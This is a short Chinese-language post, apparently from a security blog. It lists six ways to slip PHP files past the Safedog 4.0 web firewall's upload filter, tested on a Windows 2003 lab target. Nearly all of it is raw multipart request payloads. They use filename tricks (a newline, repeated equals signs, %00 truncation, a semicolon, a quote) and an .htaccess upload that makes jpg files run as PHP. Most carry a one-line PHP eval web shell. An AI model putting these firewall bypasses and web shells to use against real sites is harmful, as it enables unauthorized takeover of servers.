文件上传
文件上传实质上还是客户端的POST请求,消息主体是一些上传信息。前端上传页面需要指定 enctype为multipart/from-data才能正常上传文件。
此处不讲各种中间件解析漏洞只列举集几种safe_dog对脚本文件上传拦截的绕过
靶机环境:win2003+safe_dog4.0.23957+webug中的上传
1、换行
Content-disposition: form-data; name="file"; filename="1.p hp" Content-Type: image/jpeg <?PHP @eval($_POST[1])?> -----------------------------127619278770
2、多个等号(不止2,3个)
Content-disposition: form-data; name="file"; filename=="2.PHP" Content-Type: image/jpeg <?PHP @eval($_POST[1])?> -----------------------------127619278770
Content-disposition: form-data; name="file"; filename==="3.PHP" Content-Type: image/jpeg <?PHP @eval($_POST[1])?> -----------------------------127619278770
3、00截断
Content-disposition: form-data; name="file"; filename="4.PHP%00" Content-Type: image/jpeg <?PHP @eval($_POST[1])?> -----------------------------127619278770
4、文件名+;号
Content-disposition: form-data; name="file"; filename="6;.PHP" Content-Type: image/jpeg <?PHP PHPinfo()?> -----------------------------127619278770
5、文件名+‘
Content-disposition: form-data; name="file"; filename="7'.PHP" Content-Type: image/jpeg <?PHP PHPinfo()?> -----------------------------127619278770
6、上传.htaccess
Content-disposition: form-data; name="file"; filename=".htaccess" Content-Type: image/jpeg AddType application/x-httpd-PHP jpg -----------------------------127619278770
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。